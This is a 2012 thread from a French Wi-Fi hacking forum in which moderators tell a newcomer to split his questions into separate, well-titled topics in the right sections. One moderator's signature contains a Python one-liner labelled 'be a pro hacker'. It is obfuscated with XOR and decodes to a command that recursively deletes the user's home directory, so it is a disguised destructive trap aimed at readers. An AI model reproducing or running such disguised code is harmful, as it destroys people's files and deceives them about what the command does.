Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#26 13-08-2012 14:44:56

antares145
Membre d'honneur
Site Web

Re : Bien débuter

fifty_sec a écrit :

pour moi ce topic c'est surtout le lieu où j'explique mon initiation etape par etape à Linux et BackTrack

Justement, c'est bien le problème : on ne veut pas que ledit topic devienne un foutoir intégral où on retrouve des questions sur tout et n'importe quoi... Si tu regardes bien, le forum est organisé en sections thématiques, et il est généralement bien classé.
Le but est double :
- aider les gens qui posent leurs questions (c'est ce qu'on fait ici)
- permettre au suivant qui a la même question de trouver directement la réponse précédente pour faire gagner du temps à tout le monde

Si tout le monde fait comme toi, les topics feront tous 15 pages dans lesquels personne d'autrene trouvera jamais rien. Et c'est ça le problème, ça ne servira qu'à toi (et encore). Comment tu veux qu'un gars pense trouver une réponse sur les dictionnaires WPA dans un topic appelé "Comment bien débuter" ? Si tu veux faire le détail de ta progression étape par étape, crées-toi un blog ou écris un journal, mais tout concentrer dans le même topic comme ici c'est pas la bonne solution. Accessoirement, c'est aussi une des règles du forum, donc on appréciera que tu la respectes smile

fifty_sec a écrit :

Vous préférez que je flood la création de topic plutôt que je post dans un topic créer à l'intention de mon initiation.

Oui, et de loin ! On préfère 5 topics dans la bonne section avec 3 messages dedans plutôt qu'un topic au nom vague, avec 45 messages dedans et où personne ne s'y retrouve. À condition que le titre des topics soit un minimum précis évidemment.

@spawn : c'est pas que je veux faire le travail à ta place, hein, c'est juste que là on allait droit dans le mur. Déformation professionnelle sans doute wink

Dernière modification par antares145 (13-08-2012 14:47:48)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#27 13-08-2012 15:26:32

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Avec une question/une remarque liée à un sujet on ne floode pas un topic, on l'enrichie. wink
Non; désolé, ce forum n'est pas fait pour fonctionner comme tu le désires.
Il est pensé pour répondre au questions du plus grand nombre en appliquant le principe du "il vaut mieux apprendre à quelqu'un à pêcher que lui donner un poisson tous les jours"
Ce forum est fait pour échanger, s'entre-aider , se documenter, .. Il est organisé d'une certaine façon pour que le matériel soit valorisable et accessible en utilisant le moteur de recherche.
Cette strucutre est essentielle et détermine la qualité du forum.
Pour cela nos règles.
- 1 Je t'ai demandé d'éditer ton titre en mettant le nom du chipset
- 2 Je t'ai demandé de ne parler dans ce topic que de problèmes de configuration/compatibilité et tu viens nous parler de capture de handshake.
Si tu veux éviter que je ferme ton topic tu devrais appliquer 1 et 2...
Si tu veux ouvrir un débat sur l'organisation du forum, si tu as des suggestions etc., nous avons des rubriques prévues à cet effet.
C'est avec grand plaisir, mais pas ici dans la rubrique conf/compatibilité.

PS: Je n'avais pas vu ta réponse antares wink

antares a écrit :

hein, c'est juste que là on allait droit dans le mur

Tu fais bien... parce que à mon goût on est en train de frôler le stade "Ayrton Senna" tongue

#28 13-08-2012 15:48:20

spawn
Modérateur

Oui, cela permettra à d'autres qui se poseront les mêmes questions que toi de trouver les réponses que tu auras eu.
Ah, juste avant de créer un topic, n'oublie pas de chercher si quelqu'un ne s'est pas déjà posé la question (:

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#29 13-08-2012 15:50:45

fifty_sec
Membre

Ok je comprends.

Annonce